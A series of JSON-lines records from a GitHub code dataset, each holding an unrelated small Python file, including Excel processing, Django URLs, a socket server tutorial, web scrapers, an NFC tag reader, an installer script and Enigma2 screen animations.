inexistent_business_no:\n inexistent_business_no[value] = 1\n print(\"value = %r, 不存在\" % (value))\n inexistent_business_no = inexistent_business_no.keys()\n print(\"\\n\\ninexistent_business_no = %r\\n\\n\" % (inexistent_business_no))\n\n # 输出数据\n output_sheet.cell(\"a1\").value = \"不存在的商家编码\"\n i = 2\n for value in inexistent_business_no:\n cell_to_do = output_sheet.cell(\"a%d\" % (i))\n cell_to_do.value = value\n i += 1\n\n wb.save(user_input.file_name_original)\n present.after_process()\n\n","repo_name":"lisifenggithub/process_excel","sub_path":"find_inexistent_business_no.py","file_name":"find_inexistent_business_no.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"35111516325","text":"from . import views\nfrom django.urls import path\n\n# List of all url patterns\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"homes\", views.home, name=\"home\"),\n path(\"main_menu\", views.main_menu, name=\"main_menu\"),\n path(\"contact_us\", views.contact_us, name=\"contact_us\"),\n path(\"change_price\", views.change_price, name=\"change_price\"),\n path(\"change_rate\", views.change_rate, name=\"change_rate\")\n]\n","repo_name":"karimammar135/forn_el_batoul","sub_path":"forn_el_batoul/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"29247588088","text":"#!/usr/bin/env python\n\n# server program for client (tut_sock_client.py) sending requests with\n# sockets (asynchronous network programming);\n# see http://asyncoro.sourceforge.net/tutorial.html for details.\n\n# run this program and then client either on same node. If they are on\n# different computers, 'host' address must be changed appropriately.\n\nimport sys, socket\nimport asyncoro\n\ndef process(conn, coro=None):\n global n\n if sys.version_info.major >= 3:\n eol = ord('/')\n else:\n eol = '/'\n data = ''.encode()\n while True:\n data += yield conn.recv(128)\n if data[-1] == eol:\n break\n conn.close()\n n += 1\n print('recieved: %s' % data)\n\ndef server(host, port, coro=None):\n coro.set_daemon()\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock = asyncoro.AsyncSocket(sock)\n # sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind((host, port))\n sock.listen(128)\n\n while True:\n conn, addr = yield sock.accept()\n asyncoro.Coro(process, conn)\n\nn = 0\nasyncoro.Coro(server, '127.0.0.1', 8010)\n\nif sys.version_info.major > 2:\n read_input = input\nelse:\n read_input = raw_input\nwhile True:\n cmd = read_input().strip().lower()\n if cmd == 'exit' or cmd == 'quit':\n break\nprint('n = %d' % n)\n","repo_name":"pgiri/asyncoro","sub_path":"examples/tut_sock_server.py","file_name":"tut_sock_server.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"36"}
+{"seq_id":"6118513573","text":"import random\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndef get_xkcd_photo(index=None):\n idx = index or random.randint(0, 1900)\n r = requests.get(\"https://xkcd.com/{}/\".format(idx))\n\n return get_image(r.text)\n\n\ndef get_image(html_doc):\n obj = BeautifulSoup(html_doc, 'html.parser')\n return \"http:\"+obj.find(id=\"comic\").find('img').get('src')\n\n\nif __name__ == \"__main__\":\n print(get_xkcd_photo())\n","repo_name":"andrea-lascola/SimpleChatbot","sub_path":"app/modules/photo/xkcd.py","file_name":"xkcd.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"9859660569","text":"import numpy as np\nfrom pg import discount_rewards\n\ndef memory_stack(memory, num_process, state_space, action_space):\n memory = np.array(memory)\n state, action, reward = np.empty(shape=[0, state_space]), np.empty(shape=[0, action_space]), np.empty(shape=[0, 1])\n for i in range(num_process):\n state_stack, action_stack, reward_stack = np.empty(shape=[0, state_space]), np.empty(shape=[0, action_space]), np.empty(shape=[0, 1])\n for j in range(memory.shape[0]):\n if type(memory[j][1][i]) != str:\n state_stack = np.vstack([state_stack, memory[j][0][i]])\n action_stack = np.vstack([action_stack, memory[j][1][i]])\n reward_stack = np.vstack([reward_stack, memory[j][2][i]])\n discounted_stack = discount_rewards(reward_stack)\n state = np.vstack([state, state_stack])\n action = np.vstack([action, action_stack])\n reward = np.vstack([reward, discounted_stack])\n return state, action, reward\n\ndef hot_action(actions, num_process, action_space):\n action_list = []\n for action in actions:\n if action == 'done':\n a = 'done'\n else:\n a = np.zeros(action_space)\n a[action] = 1\n action_list.append(a)\n return action_list\n\ndef get_action(pg, each_terminal, num_process, state):\n actions = []\n for i in range(num_process):\n if not each_terminal[i]:\n actions.append(pg.choose_action([state[i]]))\n else:\n actions.append('done')\n return actions\n\ndef check_reward(info, num_process):\n data, reward = [], []\n for i in info:\n data.append(list(i))\n for d in data:\n reward.append(d[1])\n return reward\n\ndef check_state(info, num_process):\n data, state = [], []\n for i in info:\n data.append(list(i))\n for d in data:\n state.append(d[0])\n return state\n\ndef check_done(info, num_process):\n data, done, all_done = [], [], False\n for i in info:\n data.append(list(i))\n for d in data:\n done.append(d[2])\n if sum(list(map(int, done))) == num_process:\n all_done = True\n return done, all_done","repo_name":"chagmgang/synch_pysc2","sub_path":"synchronized_PG/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"4061083208","text":"#!/usr/bin/env python\n# coding=utf-8\n\"\"\"\n\n@athor:weifeng.guo \n@data:2019/1/7 14:44\n@filename:pandas_read_and_write_excel\n\n\"\"\"\nimport pandas as pd\nimport sys\ninput_file = sys.argv[1]\noutput_file = sys.argv[2]\ndata_frame = pd.read_excel(input_file, sheetname='january_2013')\nwriter = pd.ExcelWriter(output_file)\ndata_frame.to_excel(writer, sheet_name='jan_13_output', index=False)\nwriter.save()","repo_name":"guoweifeng216/python","sub_path":"liyong_python_jingxing_shujufenxi/python_basic/chapter3/pandas_read_and_write_excel.py","file_name":"pandas_read_and_write_excel.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"43844792479","text":"# Guess Number 🔢\n# Codédex\n\nguess = 0\ntries = 0\n\nwhile guess != 6 and tries < 5:\n guess = int(input('Guess the number: '))\n tries = tries + 1\n\nif guess != 6:\n print('You ran out of tries.')\nelse:\n print('You got it!')\n","repo_name":"codedex-io/python-101","sub_path":"4-loops/18_guess_number.py","file_name":"18_guess_number.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"36"}
+{"seq_id":"40272870440","text":"\n# Prepare data\nwith open(\"day07.txt\", \"r\") as f:\n data = f.read().splitlines()\ndata = data[0].split(\",\")\ndata = [int(d) for d in data]\n# Sort and find the median\ndata.sort()\nmedian = data[len(data) // 2]\n# Calculate fuel for part 1\nfuel = 0\nfor n in data:\n diff = abs(n-median)\n print(\"adding \",n,\"diff\",diff)\n fuel += diff\nprint(fuel)\n\ndef triangular(n):\n return n * (n+1) / 2\n\nresults = []\nlowestfuel = 999999999999\nlowestfueli = 0\nfor objective in range(0,1899):\n fueltotal=0\n for n in data:\n fuelindividual = triangular(abs(n-objective)) # 1 +2 +3 +4 +5 ,,, 1 3 6 10 15\n fueltotal += fuelindividual\n # print(\"For element\",n,\"fuel\",fuelindividual)\n print(objective,fueltotal)\n if fueltotal < lowestfuel:\n lowestfuel = fueltotal\n lowestfueli = objective\n results.append((objective,fueltotal))\nprint(\"optimal position\",lowestfueli, \"requires lowest fuel\",lowestfuel)\n\n","repo_name":"paulbaumgarten/advent-of-code","sub_path":"2021/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"}
+{"seq_id":"26606763909","text":"t=int(input())\n\na=300\nb=60\nc=10\n\ntime=[a,b,c]\nresult=[]\n\nfor sec in time:\n ans=0\n ans+=t//sec\n t%=sec\n result.append(ans)\n\nif t==0:\n print(*result)\nelse:\n print(-1)\n\n \n \n","repo_name":"realme1st/Algorithm-study","sub_path":"Baekjoon/그리디/전자레인지 (10162).py","file_name":"전자레인지 (10162).py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"1699505213","text":"import torch\nimport torch.nn as nn\nfrom transformers import AutoModel, AutoTokenizer\nfrom transformers.models.deberta_v2.modeling_deberta_v2 import *\n\n\nclass RobertaWrapper(nn.Module):\n def __init__(self, device, n_classes, truncation_list = None):\n super().__init__()\n self.truncation_list = truncation_list\n self.model = AutoModel.from_pretrained(\"roberta-base\")\n self.tokenizer = AutoTokenizer.from_pretrained(\"roberta-base\")\n self.classifier = nn.Linear(768, n_classes)\n self.device = device\n\n def forward(self, input_texts):\n input_batch = self.tokenizer(input_texts, padding=True, truncation=True, return_tensors=\"pt\")\n input_batch = {key: tensor.to(self.device) for key, tensor in input_batch.items()}\n if self.truncation_list is None:\n output = self.model(**input_batch).last_hidden_state\n output = torch.mean(output, dim=1)\n return self.classifier(output)\n else:\n input_tokens = input_batch['input_ids']\n embeds = self.model.embeddings(input_tokens)\n total_length = embeds.shape[1]\n for i in range(len(self.truncation_list)):\n output = self.model.encoder.layer[i](embeds)[0]\n cur_length = max(1, int(self.truncation_list[i] * total_length))\n output = output[:, :cur_length, :]\n output = torch.mean(output, dim=1)\n return self.classifier(output)\n","repo_name":"faaaaaaaaaaaaakeacc/effective_sequence_compression","sub_path":"effective_sequence_compression/models/roberta.py","file_name":"roberta.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"1991795328","text":"import binascii\n\nfrom .card import nfc_tlv_parse, CardError\n\n\nclass NtagMixin:\n def fast_read(self, start, end):\n length = (end + 1 - start) * 4\n return self.communicatethru([0x3A, start, end], response_length=length)\n\n def read_cnt(self, counter):\n response = self.communicatethru([0x39, counter], response_length=3)\n if response:\n return int.from_bytes(response, \"little\")\n return None\n\n def read_sig(self):\n return self.communicatethru([0x3C, 0x00], response_length=32)\n\n def pwd_auth(self, pwd):\n # pwd should be 4 bytes\n return self.communicatethru(b\"\\x1B\" + pwd, response_length=2)\n\n @property\n def ntag_version(self):\n return self.version\n\n @property\n def ntag_model(self):\n return self.model\n\n @property\n def ntag_signature(self):\n if \"ntag_signature\" in self.data:\n return self.data[\"ntag_signature\"]\n try:\n self.data[\"ntag_signature\"] = self.read_sig()\n return self.data[\"ntag_signature\"]\n except CardError:\n return None\n\n @property\n def ntag_data(self):\n if \"ntag_data\" in self.data:\n return self.data[\"ntag_data\"]\n if self.ntag_version is None:\n return None\n version_map = {\n b\"\\x00\\x04\\x04\\x02\\x01\\x00\\x0F\\x03\": 0x2C,\n b\"\\x00\\x04\\x04\\x02\\x01\\x00\\x11\\x03\": 0x86,\n b\"\\x00\\x04\\x04\\x02\\x01\\x00\\x13\\x03\": 0xE6,\n b\"\\x00\\x04\\x04\\x04\\x01\\x00\\x0F\\x03\": 0x2C,\n b\"\\x00\\x04\\x04\\x04\\x01\\x00\\x11\\x03\": 0x86,\n b\"\\x00\\x04\\x04\\x04\\x01\\x00\\x13\\x03\": 0xE6,\n }\n try:\n max_block = version_map[self.ntag_version]\n except KeyError:\n return None\n read_blocks = 56\n data = b\"\"\n for block_start in range(0, max_block, read_blocks):\n block_end = min(block_start + read_blocks, max_block)\n try:\n response = self.fast_read(block_start, block_end)\n except CardError:\n return None\n if response:\n data = data + response\n else:\n return None\n self.data[\"ntag_data\"] = data\n return self.data[\"ntag_data\"]\n\n @property\n def ntag_counter(self):\n if \"ntag_counter\" in self.data:\n return self.data[\"ntag_counter\"]\n try:\n # read block zero to ensure that counter is incremented\n # self.communicatethru([0x3A, 0, 0], response_length=4)\n self.fast_read(0, 0)\n count = self.read_cnt(2)\n if count is not None:\n self.data[\"ntag_counter\"] = count\n return count\n except CardError:\n return None\n\n @property\n def ntag_ndef(self):\n if self.ntag_data is None:\n return None\n cc = self.ntag_data[12:16]\n data = self.ntag_data[16:]\n if cc[0] == 0xE1:\n version = cc[1]\n data_area_size = cc[2] * 8\n read_access = cc[3] >> 4\n write_access = cc[3] & 0x0F\n # print(\"cc\", binascii.hexlify(cc, \" \"))\n # print(\" version {}.{}\".format(version >> 4, version & 0x0F))\n # print(\" data area size {}\".format(data_area_size))\n # print(\" read access {}\".format(read_access))\n # print(\" write access {}\".format(write_access))\n # if len(data) < data_area_size:\n # print(\"fetching more data\")\n # nblocks = (data_area_size - len(data)) / 4\n # data = data + self.read_blocks(7, 6 + nblocks)\n # print(\"data\", data)\n messages = []\n terminated = False\n # print(data)\n for t, l, v in nfc_tlv_parse(data):\n # print(\"tlv\", t, l, v)\n if t == 0xFE:\n terminated = True\n break\n if t == 0x03:\n messages.append(v)\n if not terminated:\n print(\"missing data\")\n return 
messages\n","repo_name":"timhawes/timhawes_circuitpython_nfc","sub_path":"timhawes_nfc/ntag.py","file_name":"ntag.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"18854512250","text":"import cv2 # import the OpenCV module\nimport numpy as np # import the numpy module using the name 'np'.\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n\ndef buildCDF(img, outputImageName, cIndex, title):\n hist= cv2.calcHist([img], [cIndex], None, [256], [0, 256])\n cdf = hist.cumsum()\n cdf_normalized = cdf * hist.max()/ cdf.max()\n \n fig = plt.figure()\n \n plt.plot(cdf_normalized, color = 'b')\n plt.hist(img.flatten(),256,[0,256], color = 'r')\n plt.xlim([0,256])\n plt.legend(('cdf','histogram'), loc = 'upper left')\n plt.title(title) # subplot 211 title\n plt.savefig(outputImageName)\n\nif __name__ == \"__main__\":\n imgGrey = cv2.imread('img/messi.jpg',0) # grey scale\n buildCDF(imgGrey, \"result/01-histogram-cfd-messi-grey.png\", 0, \"grey\")\n imgColor = cv2.imread('img/messi.jpg',1) # color BGR scale\n buildCDF(imgColor, \"result/01-histogram-cfd-messi-color_b.png\", 0, \"b-color\")\n buildCDF(imgColor, \"result/01-histogram-cfd-messi-color_g.png\", 1, \"g-color\")\n buildCDF(imgColor, \"result/01-histogram-cfd-messi-color_r.png\", 2, \"r-color\")","repo_name":"matitaweb/mumet2017_computer_vision_homework","sub_path":"HOMEWORK_01/cumulative_histogram/cumulative_histogram.py","file_name":"cumulative_histogram.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"7226045656","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.loader import ItemLoader\nfrom parliament_lk.items import News\n\n\nclass NewsSpider(scrapy.Spider):\n name = 'news'\n allowed_domains = ['parliament.lk']\n start_urls = ['http://parliament.lk/en/news-en?view=news&category=6']\n\n def parse(self, response):\n for news in response.xpath('//td[@width=\"82%\"]/a/@href').extract():\n \tyield scrapy.Request(response.urljoin(news),callback=self.parseNews)\n\n next_page_url = response.xpath('//li[@class=\"pagination-next\"]/a/@href').extract_first()\n if next_page_url is not None:\n yield scrapy.Request(response.urljoin(next_page_url))\n\n\n def parseNews(self, response):\n \tl = ItemLoader(item=News(), response=response)\n \tl.add_xpath('title', '//table[@class=\"newsheader\"]//td//h2[1]/text()')\n \tl.add_xpath('date', '//table[@class=\"newsheader\"]//tr[1]/td[3]/text()')\n \tl.add_xpath('content', '//div[@class=\"inner-div newsarea\"]/div[1]/p[string-length(text()) > 3]/text()')\n \tyield l.load_item()\n","repo_name":"prabod/CS4642-IR-Parliament.lk-Scraper","sub_path":"parliament_lk/spiders/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"18425277017","text":"from django.urls import path\nfrom work1App import views\n\n\nurlpatterns = [\n path('', views.apiOverview, name='api-Overview'),\n #CRUD\n path('add/', views.add,name='add'),\n path('Search_filter/', views.Search_filter.as_view(),name='Search_filter'),\n path('update//', views.update,name='update'),\n path('remove//', views.remove,name='remove'),\n path('viewAll/', views.viewAll,name='viewAll'),\n \n\n]\n\n","repo_name":"Aju600610/work1-evaluation-ajith","sub_path":"work1pro/work1App/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"3320883982","text":"#!/usr/bin/env python\n\nimport click\n\n@click.option('-o',\n '--opt',\n required=False, \n help='Provide additional data if required')\n@click.argument('argu',\n required=True)\n@click.command()\ndef mycli(argu, opt):\n \"\"\"Env is all set!!!!\"\"\"\n print(\"Provided argument is {} and Option is {}\".format(argu, opt))\n\nif __name__ == '__main__':\n mycli()\n","repo_name":"Lakshmisowmya/git_apis_cli","sub_path":"my-cli.py","file_name":"my-cli.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"15857499761","text":"import requests\nimport os\nimport zipfile\n\n# demande où installer l'application\nprint(\"Installateur du launcher de Fastattack\")\nprint(\"Verion de l'installateur: v1.2, version du launcher à installer: v1.2\")\nvarb = True\ndossier = \"\"\nwhile varb:\n dossier = input(\"Dans quel dossier voulez vous installer le launcher [chemin valide]: \")\n if dossier.startswith('\"') and dossier.endswith('\"'):\n dossier = dossier.removeprefix('\"')\n dossier = dossier.removesuffix('\"')\n if os.path.isdir(dossier):\n varb = False\n else:\n print(\"Chemin/nom de dossier invalide\")\n\n# demande s'il faut créer un raccourci sur le bureau\nraccourci = input(\"Voulez vous créer un raccourci sur le bureau [Y/n]: \")\nif raccourci == \"Y\":\n racourci = True\nelse:\n raccourci = False\n\n# télécharge le fichier .zip qui contient l'application et les fichiers\nurl = \"https://github.com/fastattackv/Launcher-de-Fastattack/blob/main/T%C3%A9l%C3%A9chargements/Launcher%20de%20Fastattack%20v1.2.zip?raw=true\"\nfilename = dossier + r\"\\Launcher de Fastattack v1.0.zip\"\ntry:\n r = requests.get(url)\nexcept:\n print(\"ERROR: Le fichier à télécharger n'existe pas: essayez d'éxecuter la dernière version de l'application d'installation\")\n input(\"Entrée pour quitter\")\nelse:\n f = open(filename, 'wb')\n f.write(r.content)\n f.close()\n\n# dézip le fichier\n with zipfile.ZipFile(filename, 'r') as zip_ref:\n zip_ref.extractall(dossier)\n\n# supprime le .zip\n os.remove(filename)\n\n# créé le raccourci\n if raccourci:\n import win32com.client\n\n chemin = os.path.join(os.path.join(os.environ['USERPROFILE']), r'Desktop\\Launcher de Fastattack.lnk')\n target = dossier + r\"\\Launcher de Fastattack\\Launcher de Fastattack.exe\"\n\n shell = win32com.client.Dispatch(\"WScript.Shell\")\n shortcut = shell.CreateShortCut(chemin)\n shortcut.Targetpath = target\n shortcut.WindowStyle = 7\n shortcut.save()\n\n print(\"Installation terminée\")\n input(\"Entrée pour quitter\")\n","repo_name":"fastattackv/Launcher-de-Fastattack","sub_path":"Fichiers source (.py)/Installer_launcher_de_Fastattack.py","file_name":"Installer_launcher_de_Fastattack.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"74330749223","text":"from enigma import getDesktop, eSize, ePoint, eMatrix4x4, eFloatAnimation, ePointAnimation, eSizeAnimation, eMatrixAnimation, eLinearInterpolator, eAcclerateInterpolator, eDecelerateInterpolator, eOvershootInterpolator, eBounceInterpolator, eWindowAnimationManager, eWindowAnimationSet\nfrom Tools.Directories import resolveFilename, fileExists, SCOPE_SKIN\nfrom Tools.Log import Log\nimport xml.etree.cElementTree as ET\n\nclass ScreenAnimations(object):\n\tdef __init__(self):\n\t\tself._desktopSize = getDesktop(0).size()\n\n\tdef loadDefault(self):\n\t\tanimset = eWindowAnimationSet.create()\n\t\tanimset.setKey(eWindowAnimationManager.KEY_DISABLED)\n\t\tanimset.setName(_(\"Disable Animations\"))\n\t\teWindowAnimationManager.setAnimationSet(animset)\n\t\tf = resolveFilename(SCOPE_SKIN, \"animations.xml\")\n\t\tif fileExists(f):\n\t\t\tself.fromXML(filesource=f)\n\n\tdef fromXML(self, filesource=None, xml=None):\n\t\tif filesource:\n\t\t\troot = ET.parse(filesource).getroot()\n\t\telse:\n\t\t\troot = ET.fromstring(xml)\n\t\tfor animation in root:\n\t\t\ttry:\n\t\t\t\tattrib = animation.attrib\n\t\t\t\tkey = attrib[\"key\"]\n\t\t\t\tname = _(attrib.get(\"title\", key))\n\t\t\t\tinternal = \"internal\" in attrib\n\t\t\t\tduration = int(attrib.get(\"duration\", 0))\n\t\t\t\talpha = pos = size = matrix = 0\n\t\t\t\talpha_hide = pos_hide = size_hide = rotate_hide = 0\n\n\t\t\t\tfor item in animation:\n\t\t\t\t\tif item.tag == \"alpha\":\n\t\t\t\t\t\talpha = self._buildFloatAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"position\":\n\t\t\t\t\t\tpos = self._buildPointAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"size\":\n\t\t\t\t\t\tsize = self._buildSizeAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"rotate\":\n\t\t\t\t\t\tmatrix = self._buildMatrixAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"alpha_hide\":\n\t\t\t\t\t\talpha_hide = self._buildFloatAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"position_hide\":\n\t\t\t\t\t\tpos_hide = self._buildPointAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"size_hide\":\n\t\t\t\t\t\tsize_hide = self._buildSizeAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"rotate_hide\":\n\t\t\t\t\t\trotate_hide = self._buildMatrixAnimation(item, duration, self._buildInterpolator(attrib))\n\n\t\t\t\tif alpha or pos or size or matrix or alpha_hide or pos_hide or size_hide or rotate_hide:\n\t\t\t\t\tanimset = eWindowAnimationSet.create()\n\t\t\t\t\tanimset.setKey(key)\n\t\t\t\t\tanimset.setName(name)\n\t\t\t\t\tanimset.setInternal(internal)\n\t\t\t\t\tif alpha:\n\t\t\t\t\t\tanimset.setAlpha(alpha)\n\t\t\t\t\tif pos:\n\t\t\t\t\t\tanimset.setPos(pos)\n\t\t\t\t\tif size:\n\t\t\t\t\t\tanimset.setSize(size)\n\t\t\t\t\tif matrix:\n\t\t\t\t\t\tanimset.setMatrix(matrix)\n\t\t\t\t\tif alpha_hide:\n\t\t\t\t\t\tanimset.setAlphaReverse(alpha_hide)\n\t\t\t\t\tif pos_hide:\n\t\t\t\t\t\tanimset.setPosReverse(pos_hide)\n\t\t\t\t\tif size_hide:\n\t\t\t\t\t\tanimset.setSizeReverse(size_hide)\n\t\t\t\t\tif rotate_hide:\n\t\t\t\t\t\tanimset.setMatrixReverse(rotate_hide)\n\t\t\t\t\teWindowAnimationManager.setAnimationSet(animset)\n\n\t\t\texcept Exception as ex:\n\t\t\t\tLog.w(\"FAILED to parse an xml defined animation! 
%s: %s\\n%s\" %(animation.tag, animation.attrib, ex))\n\n#eLinearInterpolator()\n#eAcclerateInterpolator(float factor)\n#eDecelerateInterpolator(float factor)\n#eOvershootInterpolator(float tension = 2.0)\n#eBounceInterpolator()\n\tdef _buildInterpolator(self, attrib):\n\t\tinterpolator = eLinearInterpolator.create() #boring linear is the default\n\t\tkey = attrib.get(\"interpolate\", \"linear\")\n\t\tif key == \"accelerate\":\n\t\t\tif \"factor\" in attrib:\n\t\t\t\tinterpolator = eAcclerateInterpolator.create( float(attrib[\"factor\"]) )\n\t\t\telse:\n\t\t\t\tinterpolator = eAcclerateInterpolator.create()\n\t\telif key == \"decelerate\":\n\t\t\tif \"factor\" in attrib:\n\t\t\t\tinterpolator = eDecelerateInterpolator.create( float(attrib[\"factor\"]) )\n\t\t\telse:\n\t\t\t\tinterpolator = eDecelerateInterpolator.create()\n\t\telif key == \"overshoot\":\n\t\t\tif \"tension\" in attrib:\n\t\t\t\tinterpolator = eOvershootInterpolator.create( float(attrib[\"tension\"]) )\n\t\t\telse:\n\t\t\t\tinterpolator = eOvershootInterpolator.create()\n\t\telif key == \"bounce\":\n\t\t\tinterpolator = eBounceInterpolator.create()\n\n\t\treturn interpolator\n\n#eFloatAnimation(int64_t duration, float from, float to, bool reversed = false, ePtr interpolator=0)\n\tdef _buildFloatAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tisReverse = item.tag == \"alpha_hide\"\n\t\tfromValue = float(attrs[\"val\"])\n\t\ttoValue = 1.0\n\t\tif isReverse:\n\t\t\treturn eFloatAnimation.create(duration, toValue, fromValue, False, interpolator)\n\t\telse:\n\t\t\treturn eFloatAnimation.create(duration, fromValue, toValue, False, interpolator)\n\n#ePointAnimation(int64_t duration, ePoint from, ePoint to, bool reversed = false, ePtr interpolator=0, bool isReverse=false, bool animateX=true, bool animateY=true)\n\tdef _buildPointAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tisReverse = item.tag == \"position_hide\"\n\t\tanimateX = \"animateX\" in attrs\n\t\tanimateY = \"animateY\" in attrs\n\t\tif not animateX and not animateY:\n\t\t\tanimateX = animateY = True\n\n\t\tfactor = float(attrs[\"val\"])\n\t\tx = int( self._desktopSize.width() * factor )\n\t\ty = int( self._desktopSize.height() * factor )\n\n\t\tif isReverse:\n\t\t\tfromPos = ePoint()\n\t\t\ttoPos = ePoint(x,y)\n\t\telse:\n\t\t\tfromPos = ePoint(x,y)\n\t\t\ttoPos = ePoint()\n\t\treturn ePointAnimation.create(duration, fromPos, toPos, factor, False, interpolator, isReverse, animateX, animateY)\n\n#eSizeAnimation(int64_t duration, eSize from, eSize to, bool reversed = false, ePtr interpolator=0)\n\tdef _buildSizeAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tisReverse = item.tag == \"size_hide\"\n\t\tanimateW = \"animateW\" in attrs\n\t\tanimateH = \"animateH\" in attrs\n\t\tcentered = \"centered\" in attrs\n\t\tif not animateW and not animateH:\n\t\t\tanimateW = animateH = True\n\t\tw, h = attrs[\"val\"].split(\",\")\n\t\tw, h = int(w), int(h)\n\t\tfromSize = eSize(w,h)\n\t\ttoSize = eSize()\n\t\treturn eSizeAnimation.create(duration, fromSize, toSize, False, interpolator, isReverse, animateW, animateH, centered)\n\n#eMatrixAnimation(int64_t duration, eMatrix4x4 from, eMatrix4x4 to, bool reversed = false, ePtr 
interpolator=0)\n\tdef _buildMatrixAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tx,y = float(attrs.get(\"x\", \"0\")), float(attrs.get(\"y\", \"0\"))\n\t\t#z = float(attrs.get(\"z\", \"0\"))\n\t\tfromMatrix = eMatrix4x4.rotateX(x) * eMatrix4x4.rotateY(y)#z axis rotation is currently not suported * eMatrix4x4.rotateZ(z)\n\t\ttoMatrix = eMatrix4x4.identity()\n\t\treturn eMatrixAnimation.create(duration, fromMatrix, toMatrix, False, interpolator)\n","repo_name":"opendreambox/enigma2","sub_path":"usr/lib/enigma2/python/Components/ScreenAnimations.py","file_name":"ScreenAnimations.py","file_ext":"py","file_size_in_byte":6944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"30989693957","text":"\"\"\" Ch 4: Trees and Graphs ~~~~~~~~~~~~~~~~~~~~\n\n* Note that Worst and avg case times may vary\n* Ask lots of clarifying questions! \n* There are many types!\n\nGraphs:\n\t- \n\nTrees\n\t- are a type of graph\n\t- composed of nodes\n\t- has a root node\n\t- each node has 0 or more child nodes\n\t- and so on, recursively\n\nBinary Trees\n\t- A tree where each node has 0-2 children\n\t- 'leaf' is a node w/o children\n\nBinary Search Tree\n\t- A Binary tree is a binary serach tree if\n\tall left descendenc <= n < all right descendents.\n\t- True for each node n\n\t- Clarify where duplicate values should be\n\n\"Balanced\"\n\t- Not perfect, but more or less so\n\t- Approx O(log n) for `insert` and `find`\n\n\"Complete\"\n\t- If you filled it from left to right, as you should,\n\t- The right slot is missing, not the left slot\n\n\"Full Binary Tree\"\n\t- Each node has zero or two children\n\t- No nodes have only one child\n\n\"Perfect Binary Tree\"\n\t- Both full and complete\n\t- All leaf nodes at same level\n\t- If so, a perfect tree has 2^k - 1 nodes\n\n\"Min-Heap\"\n\t- \n\n\"\"\"\n\nclass Node:\n\t\"\"\" A general node for trees or graphs\n\t\t>>> n3 = Node('n3')\n\t\t>>> print(n3)\n\t\tLeaf n3\n\t\t>>> n2 = Node('n2', [n3]), \n\t\t>>> print(n2)\n\t\t(Node n2 [Leaf n3],)\n\t\t>>> n1 = Node('n1', children=[n2, Node('n4')])\n\t\t>>> print(n1)\n\t\tNode n1 [(Node n2 [Leaf n3],), Leaf n4]\n\t\"\"\"\n\n\tdef 